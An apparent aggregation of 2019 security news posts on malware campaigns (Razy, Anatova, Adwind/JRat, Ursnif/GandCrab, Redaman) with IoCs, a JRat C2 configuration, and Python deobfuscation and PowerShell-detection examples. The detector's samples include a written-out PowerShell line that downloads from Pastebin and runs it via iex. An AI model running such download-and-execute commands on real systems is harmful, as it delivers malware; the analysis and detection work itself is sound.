The post Malware: Three Industry Problems and How to Solve Them appeared first on The State of Security.

Razy Trojan Installs Malicious Browser Extensions to Steal Cryptocurrency

Security researchers observed the Razy Trojan installing malicious extensions across multiple web browsers to steal cryptocurrency.

In 2018, Kaspersky Lab noticed that the Trojan was being distributed via advertising blocks on websites and free file hosting services disguised as legitimate software. The malware uses different infection processes for Google Chrome, Mozilla Firefox and Yandex Browser, disabling automatic updates and integrity checks for installed extensions.

Razy then uses its main.js script to steal cryptocurrency by searching websites for the addresses of digital wallets. If it finds what it’s looking for, the Trojan replaces the wallet addresses with those controlled by the malware’s operators.

Razy can also spoof images of QR codes that point to cryptocurrency wallets, modify digital currency exchanges’ webpages by displaying messages that lure users with the promise of new features, and alter Google or Yandex search results to trick victims into visiting infected websites.

Not the First Cryptocurrency Stealer — And Likely Not the Last

The Razy Trojan isn’t the first malware known for stealing users’ cryptocurrency. In July 2018, for example, Fortinet came across a malware sample that modified victims’ clipboard content to replace a copied bitcoin address with one belonging to threat actors. Just a few months later, researchers at enSilo discovered DarkGate, malware that is capable of crypto-mining and ransomware-like behavior in addition to stealing virtual currency from victims’ wallets.

These malware samples played a part in the rise of cryptocurrency theft last year. In just the first six months of 2018, Carbon Black observed that digital currency theft reached $1.1 billion. One of the incidents that took place within that time period involved the theft of $530 million, as reported by CNN.

How to Defend Against Malware Like Razy

Security professionals can help defend against threats like Razy by incorporating artificial intelligence (AI) into their organizations’ malware defense strategies, including the use of AI in detectors and cyber deception to misdirect and deactivate AI-powered attacks. Experts also recommend using blockchain and other advanced technologies to protect against cryptocurrency threats.

The post Razy Trojan Installs Malicious Browser Extensions to Steal Cryptocurrency appeared first on Security Intelligence.

Beware; hackers are using malicious TeamViewer tool to spread malware

By Waqas

TeamViewer is a popular remote control desktop sharing software with more than 1 billion users and that makes it a lucrative target for cyber criminals. Recently, the IT security researchers at Trend Micro have uncovered a malware campaign targeting unsuspecting users with a malicious version of TeamViewer. Note: It is worth mentioning that the official website […]

This is a post from HackRead.com Read the original post: Beware; hackers are using malicious TeamViewer tool to spread malware

The Story of Manuel’s Java RAT

During the last weeks, the Cybaze-Yoroi ZLab researchers identified infection attempts aimed at installing RAT malware, directed at the naval industry sector. The malicious email messages contained a particular Adwind/JRat variant

The post The Story of Manuel’s Java RAT appeared first on The Cyber Security Place.

1 in 8 Businesses Are Destroyed by Data Breaches. Don’t Be a Statistic

I have frequently stated that one of the leading causes of business failures is poor cash flow management. According to a study by US Bank, 82% of all businesses that

The post 1 in 8 Businesses Are Destroyed by Data Breaches. Don’t Be a Statistic appeared first on The Cyber Security Place.

Hackers abusing Google App Engine to spread PDF malware

By Waqas

The Cobalt Strike advanced persistent threat (APT) group is using Google App Engine to spread PDF malware against financial firms. The IT security researchers at Netskope have discovered a sophisticated malware campaign in which cybercriminals are abusing Google App Engine (GCP), a web framework and cloud computing platform to deliver malware via PDF decoys. According to researchers, the malware campaign is currently […]

This is a post from HackRead.com Read the original post: Hackers abusing Google App Engine to spread PDF malware

Anatova ransomware – Experts believe it will be a dangerous threat

Security experts at McAfee have discovered a new malware, dubbed Anatova ransomware, that has been spotted infecting computers worldwide

The name Anatova is based on a name in the ransom note that is dropped on the infected systems.

The Anatova ransomware stands out for its obfuscation capabilities and its ability to infect network shares; it has a modular structure that allows new functions to be added to the malware.

“During our continuous hunt for new threats, we discovered a new ransomware family we call Anatova (based on the name of the ransom note). Anatova was discovered in a private peer-to-peer (p2p) network.” reads the analysis published by McAfee.

Malware experts from McAfee discovered the Anatova ransomware on a private peer-to-peer network.
Anatova uses the icon of a game or application to trick victims into downloading and executing it.

The malware uses a manifest to request admin rights, implements multiple efficient protection techniques against static analysis, and makes a few checks to avoid running in a sandbox.

The malware demands $700 in ransom to decrypt the data.

The largest number of infections was observed in the United States, followed by Germany, Belgium, France, and the UK. It is interesting to note that the malware doesn’t infect systems from a list of the countries that includes all CIS countries, Syria, Egypt, Morocco, Iraq, and India.

Anatova ransomware

“It’s quite normal to see the CIS countries being excluded from execution and often an indicator that the authors might be originating from one of these countries.” continue the experts. “In this case it was surprising to see the other countries being mentioned. We do not have a clear hypothesis on why these countries in particular are excluded.”

The ransomware looks for files that are smaller than 1 MB and avoids encrypting files of the operating system. Anatova also checks for network shares; this is particularly dangerous in large organizations because a single infection can cause severe problems for several systems in the company network.

Each Anatova sample uses its own key; this implies that there is no master key available that could be used to decrypt all victims’ files.

After encrypting the files, the ransomware cleans the key, IV, and private RSA key values from memory, to prevent anyone from dumping this information from memory and using it to decrypt files.

“When all this is done, Anatova will destroy the Volume Shadow copies 10 times in very quick succession. Like most ransomware families, it is using the vssadmin program, which required admin rights, to run and delete the volume shadow copies.” states McAfee.

According to McAfee, the Anatova ransomware was developed by skilled vxers, the researchers believe it is a prototype being tested and has the potential to become a serious threat.

Additional details, including IoCs, are reported in the analysis published by McAfee.

Pierluigi Paganini

(SecurityAffairs – Anatova ransomware, cybercrime)

The post Anatova ransomware – Experts believe it will be a dangerous threat appeared first on Security Affairs.

The Story of Manuel’s Java RAT.

Security experts from Cybaze-Yoroi ZLab investigated two malicious spam campaigns delivering Java RAT that show some similarities.

Introduction

During the last weeks, the Cybaze-Yoroi ZLab researchers identified infection attempts aimed at installing RAT malware, directed at the naval industry sector. The malicious email messages contained a particular Adwind/JRat variant delivered via several methods tailored to lure the target company.

In the recent past, similar attack cases hit this industry, such as the MartyMcFly case, where the attackers weaponized their emails with QuasarRAT payloads. In this case, instead, Cybaze-Yoroi ZLab detected the usage of multiplatform Java malware.

Technical analysis

A preliminary analysis of the two malicious email waves shows no strict common indicators: the SMTP infrastructure detected on the 16th and 17th is different from the one seen on the 21st, the attachment types didn’t match (the first wave contained .jar attachments, the second ZIP archives and JS scripts), and the email theme was different too.

In detail, the first email wave was prepared to simulate a purchase order, trying to impersonate administrative personnel of an Italian company operating in the hydraulic and lifting sectors, “Difast Srl”. These messages were written in Italian.

The second email wave, instead, was no longer in Italian. This time the attackers were trying to impersonate a German logistics company, “Dederich Spedition”, simulating another kind of purchase order communication.

However, we figured out these two email waves were linked to the same attacker.

Dissecting the Stage1

The following attachments have been analyzed by Cybaze-Yoroi Zlab team:

Sha256: a17b18ba1d405569d3334f4d7c653bf784f07805133d7a1e2409c69c67a72d99
Threat: JAR/Dropper
ssdeep: 12288:1zdaHanWmyPL64RrYzX/6ZjHfTMmy7KUBjycRKXsfp330VPMsCXtZcLzSU:1zUHanW3DJRr0/ubfTK3hycjfx30VPMw

Sha256: cb5389744825a8a8d97c0dce8eec977ae6d8eeca456076d294c142d81de94427
Threat: JAR/Dropper
ssdeep: 12288:LR9aQ+oSsyJZVqhoae1yjocYKLCpOo5q/mOmFgnxhQZMR:C4yuoCoflp1DFOxx

Sha256: 5b7192be8956a0a6972cd493349fe2c58bc64529aa1f62b9f0e2eaebe65829be
Threat: JS/Dropper
ssdeep: 12288:Vhz+1VYSCR8TedejbWcGrwmzt7cOk6O6vJX9SxmN6QjH9HJW93awECdf66bC8a:rzbsedejF1k1BXFRVJjXl

The first two malware samples were attached to the suspicious emails sent since 16th January. The last was embedded into the 21st January emails. 

Analyzing the first two JAR archives in detail, it is possible to see that the source code is the same, except for the names of the declared classes. Thus, the analysis is conducted on only one of them.

Figure 2 – Comparison between the two JAR file droppers

Unlike the JAR samples, the JS file has a different structure, as visible in the following figure.

Figure 3 – Code snippet of js file dropper

Despite the different structures of code and programming languages, all the dropper samples have the same encoded payload strings.

The string labeled with the variable name “duvet” hides another layer of code. The obfuscation method is quite simple: just replace the “#@>” token with “m”, and decode everything from base64. The result of the decoding is visible in the following figure:

Table 4 – First step decryption of base64 encoded string

In the previous code snippet, a malware routine checks for the existence of the Java environment on the victim machine: if it is not installed, it downloads the JRE environment from an external location, a potentially compromised third-party website, “hxxp://www[.thegoldfingerinc[.]com/images/jre.zip”.

Figure 5 – Open directory used by malware to download jre.zip component

After downloading the JRE archive, the malware installs it on the victim machine. At this point, the malware triggers the persistence mechanism and sets the typical “CurrentVersion\Run” registry key.

Figure 7 – Registry key set by the malware

After many deobfuscation rounds of the recovered nested base64 strings, the final result is:

Figure 8 – result of decrypted code

The “longText” variable hides the final payload: another .jar file. Instead, decoding the variable “longText1”, we retrieved the following code snippet:

Figure 9 – Fake listener on localhost set by the malware in case of evasion

This code, able to create a localhost listener or a sort of proxy on port 7755, is actually unused by the rest of the RAT malware.

Converging to the Java RAT Payload

As anticipated before, the “longText” variable encodes a JAR executable containing the infamous, multi-platform (Win/macOS), Adwind/JRat malware: a Remote Access Tool well known to the InfoSec community.

Sha256: 9b2968eaeb219390a81215fc79cb78a5ccf0b41db13b3e416af619ed5982eb4a
Threat: Adwind/JRAT
ssdeep: 12288:jz8uQYmMzFIXJ9A2G5pxogQNUhIK/0c2qnAv:EuQ/ImYnsS7B2qnk

The structure of the code seen in the figure below indicates that it is the canonical Adwind/JRat malware, containing the “JRat.io” false flag.

Figure 10 – Structure of JRat malware

Finally, we extrapolated the configuration of the RAT payload, the JSON object reported in the following snippet.

{
  "NETWORK": [
    {
      "PORT": 9888,
      "DNS": "185.244.30.93"
    }
  ],
  "INSTALL": true,
  "MODULE_PATH": "KXA/Gzd/Sb.Po",
  "PLUGIN_FOLDER": "vuVCbHOEGdl",
  "JRE_FOLDER": "bvDMbv",
  "JAR_FOLDER": "oJYFGyiYDKG",
  "JAR_EXTENSION": "gHPrve",
  "ENCRYPT_KEY": "PqKOsNWuSwYdlCTuCJPnAGXoL",
  "DELAY_INSTALL": 2,
  "NICKNAME": "MANUEL1986",
  "VMWARE": false,
  "PLUGIN_EXTENSION": "xSgaW",
  "WEBSITE_PROJECT": "https://jrat.io",
  "JAR_NAME": "GErbOAiLUBf",
  "JAR_REGISTRY": "NVxqGXNfpjm",
  "DELAY_CONNECT": 2,
  "VBOX": false
}

The remote destination address 185.244.30.93, belonging to the “Stajazk VPN” service, hosts the control server reachable on port tcp/9888. Also, the configuration reveals a nickname field containing the string “MANUEL1986”.

The usage of the VPN service hides the real location of the attacker; however, the specific IP isn’t new to the threat intel community, as it has been abused since October 2018. Particularly interesting is the presence of the No-IP domain “manuel.hopto.org”: this domain also resolved to Nigerian IP addresses of the 37076-EMTS-NIGERIA-AS, and to the Italian AS1267 back in 2012-2014.
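The dropper’s string obfuscation described in the Stage1 section (replace the “#@>” token with “m”, then base64-decode, repeated over nested layers) and the JSON configuration just shown can be handled by one short script: peel the layers until the output is no longer base64, then read the C2 endpoint and operator fields out of the resulting configuration. The Python below is an added example, not Yoroi’s tooling or code from the samples; the nested sample it decodes is built here from a subset of the configuration values reported above, and the `obfuscate_layer` helper exists only to construct that sample.

```python
import base64
import binascii
import json
from typing import Dict, List

TOKEN = "#@>"  # the dropper writes this token wherever a base64 'm' would appear


def decode_layer(layer: str) -> bytes:
    """Undo one obfuscation round: restore 'm', then base64-decode with a strict alphabet."""
    return base64.b64decode(layer.replace(TOKEN, "m"), validate=True)


def peel_layers(outer: str, max_layers: int = 10) -> List[bytes]:
    """Decode nested rounds until the output is no longer a valid layer.
    Returns every intermediate result; the last element is the innermost content."""
    layers: List[bytes] = []
    current = outer.strip()
    for _ in range(max_layers):
        try:
            raw = decode_layer(current)
        except (binascii.Error, ValueError):
            break  # not base64 any more: the previous result was the innermost layer
        layers.append(raw)
        try:
            current = raw.decode("ascii").strip()
        except UnicodeDecodeError:
            break  # binary content (e.g. an embedded JAR): nothing further to peel
    return layers


def extract_iocs(config: bytes) -> Dict[str, object]:
    """Pull the fields an analyst reports from an Adwind/JRat JSON configuration."""
    cfg = json.loads(config)
    return {
        "c2": [f"{entry['DNS']}:{entry['PORT']}" for entry in cfg.get("NETWORK", [])],
        "nickname": cfg.get("NICKNAME"),
        "install": cfg.get("INSTALL"),
        "vm_checks": {"VMWARE": cfg.get("VMWARE"), "VBOX": cfg.get("VBOX")},
    }


# --- constructed sample (not the real sample's strings) ---------------------
def obfuscate_layer(data: bytes) -> str:
    """Inverse of decode_layer; used here only to build a realistic nested sample."""
    return base64.b64encode(data).decode().replace("m", TOKEN)


# Configuration values as reported in the article (subset).
SAMPLE_CONFIG = json.dumps({
    "NETWORK": [{"PORT": 9888, "DNS": "185.244.30.93"}],
    "INSTALL": True,
    "NICKNAME": "MANUEL1986",
    "VMWARE": False,
    "VBOX": False,
    "WEBSITE_PROJECT": "https://jrat.io",
}).encode()
# Two nested rounds, as the dropper does with its "duvet"/"longText" strings.
SAMPLE_OUTER = obfuscate_layer(obfuscate_layer(SAMPLE_CONFIG).encode())

if __name__ == "__main__":
    layers = peel_layers(SAMPLE_OUTER)
    print(f"{len(layers)} layers peeled")
    print(extract_iocs(layers[-1]))
```

The strict `validate=True` decode is what makes the loop terminate cleanly: the moment a layer yields text containing characters outside the base64 alphabet (braces, quotes, spaces), that text is treated as the final content rather than being silently decoded into garbage. On a real dropper the same loop stops at the embedded JAR, which fails the ASCII decode.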

Figure 11 – “manuel.hopto.org” last DNSs of C2 of JRat

Conclusions

The analyzed case shows how threat actors may quickly vary attack techniques and artifact characteristics, trying to disguise their intent by making it harder to track their attempts. This proves that the investigation capabilities of a threat research team are fundamental in a modern cyber security paradigm.

The specific attack waves are not likely related to the MartyMcFly campaign discovered a few months earlier.

Further details, including IoCs and Yara Rules, are reported in the analysis published on the Yoroi blog.

Pierluigi Paganini

(SecurityAffairs – Java RAT, malware)

The post The Story of Manuel’s Java RAT. appeared first on Security Affairs.

Why You Need to Block the Threat Factory. Not Just the Threats.

 

Cyber criminals will create roughly 100 million new malware variants over the next 12 months. Security vendors will respond with new malware signatures and behaviors to stop them, but thousands of companies will be victimized in the process, experiencing costly or catastrophic breaches. This isn’t new - it’s a cycle.

Two distinct campaigns spread GandCrab ransomware and Ursnif Trojan via weaponized docs

Security experts observed two distinct campaigns distributing the Ursnif malware, one of them also delivered the GandCrab ransomware.

Experts pointed out that the cybercrime gangs behind the two campaigns are different, but they discovered many similarities in them.

Attackers spread phishing messages using weaponized Microsoft Word documents and leverage PowerShell to deliver fileless malware.

Ursnif is a banking trojan that has been spreading since November 2017; it is also able to monitor browsing activities, collect keystrokes, system and process information, and deliver additional payloads.

GandCrab is a popular ransomware that has been active since early 2018.

Security experts at Carbon Black observed nearly 180 variants of weaponized MS Word documents associated with one of the campaigns.

“This campaign originally came in via phishing emails that contained an attached Word document with embedded macros, Carbon Black located roughly 180 variants in the wild.”  reported Carbon Black.

The macro would call an encoded PowerShell script and then use a series of techniques to download and execute both Ursnif and GandCrab.

The first malware campaign distributing two malware threats was discovered by security researchers at Carbon Black who located approximately 180 variants of MS Word documents in the wild that target users with malicious VBS macros.

Once the victims have executed the malicious VBS macro it runs a PowerShell script that uses a series of techniques to download and execute both Ursnif and GandCrab.

Ursnif and GandCrab

The PowerShell script is encoded in base64; it executes the next-stage malware, a PowerShell one-liner that downloads the final malware payloads from the Pastebin website, which are then executed in memory.

The first payload is a PowerShell one-liner that evaluates the architecture of the targeted system and then downloads the matching additional payload from the Pastebin website, which is executed in memory.

“Once the raw contents of the pastebin.com post were downloaded, that data would also be executed in memory.  In the variants that were obtained during this campaign the file contained a PowerShell script that was approximately 2800 lines.” reads the analysis.

“This PowerShell script is a version of the Empire Invoke-PSInject module, with very few modifications,” Carbon Black researchers said. “The script will take an embedded PE [Portable Executable] file that has been base64 encoded and inject that into the current PowerShell process.”

The final payload installs a variant of the GandCrab ransomware on the infected system; it also downloads a Ursnif executable from a remote server and executes it to gather information on the system and monitor the victim’s activities.

“However, numerous Ursnif variants were hosted on the bevendbrec[.]com site during this campaign. Carbon Black was able to discover approximately 120 different Ursnif variants that were being hosted from the domains iscondisth[.]com and bevendbrec[.]com,” continues the analysis.

The activity of Ursnif malware was also observed by Cisco Talos that uncovered a second campaign using a different variant.
“There are three parts to the [PowerShell] command. The first part creates a function that is later used to decode base64 encoded PowerShell. The second part creates a byte array containing a malicious DLL,” Talos researchers explained.

“The third part executes the base64 decode function created in the first part, with a base64 encoded string as the parameter to the function. The returned decoded PowerShell is subsequently executed by the shorthand Invoke-Expression (iex) function.”
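A small triage heuristic for the three-part command pattern described above (base64-decode helper, inline byte array, and iex over the decoded text), written here as an added example; it is not Talos' or Carbon Black's code, and the sample command lines are constructed.

```python
import re

# One point per matching rule; rule names are returned so an analyst sees
# which of the described stages were present on the command line.
RULES = [
    ("base64_decode", re.compile(r"FromBase64String|-EncodedCommand|\s-e(c|nc)?\s", re.I)),
    ("byte_array", re.compile(r"\[(System\.)?Byte\[\]\]", re.I)),
    ("iex", re.compile(r"\biex\b|Invoke-Expression", re.I)),
    ("in_memory_load", re.compile(r"\[Reflection\.Assembly\]::Load|Invoke-PSInject", re.I)),
    ("remote_fetch", re.compile(r"DownloadString|DownloadData|Invoke-WebRequest|pastebin\.com", re.I)),
]


def score_command(cmd: str):
    """Return (score, matched_rule_names) for one PowerShell command line."""
    if not cmd:
        return 0, []
    hits = [name for name, rx in RULES if rx.search(cmd)]
    return len(hits), hits


def is_suspicious(cmd: str, threshold: int = 2) -> bool:
    """Two or more of the stages on a single command line warrants a closer look."""
    return score_command(cmd)[0] >= threshold


# Constructed samples: a routine admin invocation, a line following the
# three-part shape Talos describes, and a Pastebin fetch piped into iex
# (the paste id is a placeholder, not a real indicator).
SAMPLES = {
    "benign": r"powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\scripts\backup.ps1",
    "three_part": ("powershell -nop -w hidden -c \"function d($s){[Text.Encoding]::UTF8.GetString("
                   "[Convert]::FromBase64String($s))};[byte[]]$dll=0x4d,0x5a,0x90;iex (d 'SGVsbG8=')\""),
    "pastebin_stage": ("powershell -nop -w hidden iex (New-Object Net.WebClient)"
                       ".DownloadString('https://pastebin.com/raw/PLACEHOLDER')"),
}


def triage(samples=SAMPLES):
    """Score every sample; returns {name: (score, hits)}."""
    return {name: score_command(cmd) for name, cmd in samples.items()}


if __name__ == "__main__":
    for name, (score, hits) in triage().items():
        print(f"{name:15} score={score} hits={hits}")
```

Legitimate deployment scripts also use `FromBase64String` or `iex`, so treat the score as a triage signal over process-creation logs rather than a blocking rule.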

This variant, like others, collects information on the infected systems. The threat stores the collected data in CAB file format and then sends it to the C2 server over an HTTPS connection.

Early December, security experts at Yoroi-Cybaze ZLAB discovered a new variant of the Ursnif malware that hit Italian users through a malspam campaign. Researchers at Yoroi-Cybaze ZLAB isolated several malicious emails having the following content:

  • Subject: “VS Spedizione DHL AWB 94856978972 proveniente dalla GRAN BRETAGNA AVVISO DI GIACENZA”
  • Attachment: “GR930495-30495.zip”

The content of the attachment was a .js file which, when launched, starts the infection by downloading the other components from the Internet.

The whole infection was composed of four stages: the generation of network noise to hide the attacker’s infrastructure, the download of the executable payload, the achievement of persistence through an installed registry key, and the check for and download of the Ursnif modules.

Back to the current campaigns, both analyses include the list of indicators of compromise (IoCs).

Pierluigi Paganini

(SecurityAffairs – Ursnif, spam)

The post Two distinct campaigns are spread GandCrab ransomware and Ursnif Trojan via weaponized docs appeared first on Security Affairs.

Attackers successfully hide Mac malware in ad images

By Waqas

Malware campaigns have become quite regular on Apple devices and, as per the new report from Confiant, a cyber-security firm, there’s a new group on the block that is specifically targeting Apple users through malvertising. The group, called VeryMal, has employed a steganography technique this time to prevent detection and hide the malicious code in […]

This is a post from HackRead.com Read the original post: Attackers successfully hide Mac malware in ad images

Vulnerable cloud infrastructure experiencing increasing attacks

Attackers are increasingly targeting vulnerable cloud infrastructure to exploit it for covert cryptojacking or to deliver ransomware, Securonix researchers warn. Some attacks are fairly trivial, but others are multi-vector/multi-platform threats where multiple functionalities are combined as part of the same malicious threat (e.g., XBash, which combines cryptomining, ransomware and botnet/worm activity). The attacks are automated and probe the infrastructure and cloud services for vulnerabilities and/or weak or default login credentials. Among the … More

The post Vulnerable cloud infrastructure experiencing increasing attacks appeared first on Help Net Security.

Malspam Campaign Targeting Russian Speakers with Redaman Malware

An ongoing malicious spam campaign is currently targeting Russian-speaking users with samples of the Redaman banking malware. Since at least September 2018, the malspam campaign has been sending out malicious spam emails written in Russian to users who mostly have email addresses ending in “.ru.” The emails use various subject lines, message content and attachment […]… Read More

The post Malspam Campaign Targeting Russian Speakers with Redaman Malware appeared first on The State of Security.

GandCrab ransomware and Ursnif virus spreading via MS Word macros

Security researchers have discovered two separate malware campaigns, one of which is distributing the Ursnif data-stealing trojan and the GandCrab ransomware in the wild, whereas the second one is only infecting victims with Ursnif malware. Though both malware campaigns appear to be a work of two separate cybercriminal groups, we find many similarities in them. Both attacks start from

Security Affairs: Kaspersky links GreyEnergy and Zebrocy activities

Security experts from Kaspersky Lab’s Industrial Control Systems Cyber Emergency Response Team (ICS CERT) linked the GreyEnergy malware with the Zebrocy backdoor.

Security researchers from Kaspersky Lab’s ICS CERT have discovered a link between the GreyEnergy malware and the Zebrocy tool.

The activity of the GreyEnergy APT group emerged in concurrence with BlackEnergy operations; experts consider the former a successor of the latter group.

GreyEnergy has been active at least since 2015; it conducted reconnaissance and cyber espionage activities in Ukraine and Poland, focusing its activities on the energy and transportation industries and other high-value targets.

“Kaspersky Lab ICS CERT has identified an overlap between GreyEnergy and a Sofacy subset called “Zebrocy”. The Zebrocy activity was named after malware that Sofacy group began to use since mid-November 2015 for the post-exploitation stage of attacks on its victims. Zebrocy’s targets are widely spread across the Middle East, Europe and Asia and the targets’ profiles are mostly government-related.” reads the analysis published by Kaspersky.

“Both sets of activity used the same servers at the same time and targeted the same organization”

The GreyEnergy APT group leverages the GreyEnergy malware, a malicious code that implements a modular architecture to extend its capabilities by adding the appropriate modules. Experts pointed out that even if the malware doesn’t have modules specifically designed to target ICS, the group has been targeting industrial workstations and SCADA systems.

The Zebrocy malware was used by the Russia-linked APT28 group (aka Fancy Bear, Pawn Storm, Sofacy Group, Sednit, and STRONTIUM), which operates under the Russian military agency GRU.

Experts at Kaspersky Lab have discovered that GreyEnergy and Zebrocy were using the same command and control (C&C) infrastructure, both used the same IP addresses associated with servers in Ukraine and Sweden.


The two malware families were used simultaneously in June 2018, and both have been used in attacks aimed at a number of industrial companies in Kazakhstan. One of the attacks was carried out in June 2018.

The spear-phishing messages that were used in the attacks that involved both malware used similar documents that purported to come from Kazakhstan’s Ministry of Energy.

“Though no direct evidence exists on the origins of GreyEnergy, the links between a Sofacy subset known as Zebrocy and GreyEnergy suggest that these groups are related, as has been suggested before by some public analysis,” concludes Kaspersky.

The discovery made by Kaspersky is very important and shows the alleged evolution of the threats.

Sharing information about these APT groups and their TTPs could help organizations in detecting the malicious activities associated with the threat actors.

Pierluigi Paganini

(SecurityAffairs – hacking, BlackEnergy)

The post Kaspersky links GreyEnergy and Zebrocy activities appeared first on Security Affairs.


New Russian Language Malspam is delivering Redaman Banking Malware

A still ongoing spam campaign that has been active during the last months has been distributing the Redaman banking malware.

Experts at Palo Alto Networks continue to monitor an ongoing spam campaign that has been distributing the Redaman banking malware.

The malware was first observed in the threat landscape in 2015; most of the victims were customers of Russian financial institutions. The malicious code was initially reported as the RTM banking Trojan, and both Symantec and Microsoft detected Redaman in 2017 and classified it as a variant of RTM.

Between September and December 2018 the experts observed a variant of the Redaman banking malware that was in the Russian language and that was distributed via spam campaigns.

Threat actors target Russian email recipients (email addresses ending in .ru) with messages using archived Windows executable files disguised as a PDF document.

“Since September of 2018, Redaman banking malware has been distributed through malspam. In this campaign, the Russian language malspam is addressed to Russian email recipients, often with email addresses ending in .ru.” reads the analysis published by Palo Alto Networks.

“These emails have file attachments. These file attachments are archived Windows executable files disguised as a PDF document.”


In the last campaign, Palo Alto Networks detected 3,845 email sessions with Redaman attachments.

The top 5 senders were Russia (3,456 sessions), Belarus (98), Ukraine (93), Estonia (29), and Germany (30), while the top 5 recipients were Russia (2,894), Netherlands (195), United States (55), Sweden (24), and Japan (16).

When the Windows executable first runs, Redaman checks for a series of files and directories that could indicate that the malware is running in a sandbox or a virtualized environment. It throws an exception and exits if any of those files are found.

When it proceeds, the executable drops a DLL file in the AppData\Local\Temp\ directory and creates a folder under C:\ProgramData\, then moves the DLL there.

The malware achieves persistence using a scheduled Windows task that allows the execution of the DLL at user logon.

“After creating a scheduled task and causing the DLL to load, the initial Redaman executable file deletes itself.” continues the analysis.

“Redaman uses an application-defined hook procedure to monitor browser activity, specifically Chrome, Firefox, and Internet Explorer. It then searches the local host for information related to the financial sector.”

Redaman monitors the activity of the most popular browsers (Chrome, Firefox, and Internet Explorer); it is able to download files, log keystrokes, capture screenshots and record video of the desktop, collect and exfiltrate financial data, monitor smart cards, shut down the infected host, modify DNS configuration, steal clipboard data, terminate running processes, and add certificates to the Windows store.

“Since it was first noted in 2015, this family of banking malware continues targeting recipients who conduct transactions with Russian financial institutions.” Palo Alto Networks concludes. 

“We found over 100 examples of malspam during the last four months of 2018. We expect to discover new Redaman samples as 2019 progresses.”

Pierluigi Paganini

(SecurityAffairs – Redaman banking Trojan, spam)

The post New Russian Language Malspam is delivering Redaman Banking Malware appeared first on Security Affairs.


Malvertising Campaign Used Steganography to Distribute Shlayer Trojan

A short-lived malvertising campaign leveraged a steganography-based payload to target Mac users with the Shlayer trojan. Named for its use of veryield-malyst[dot]com as one of its ad-serving domains, the “VeryMal” threat actor conducted its malvertising campaign between 11 January 2019 and 13 January 2019. That’s not a long time period to remain active. But the […]… Read More

The post Malvertising Campaign Used Steganography to Distribute Shlayer Trojan appeared first on The State of Security.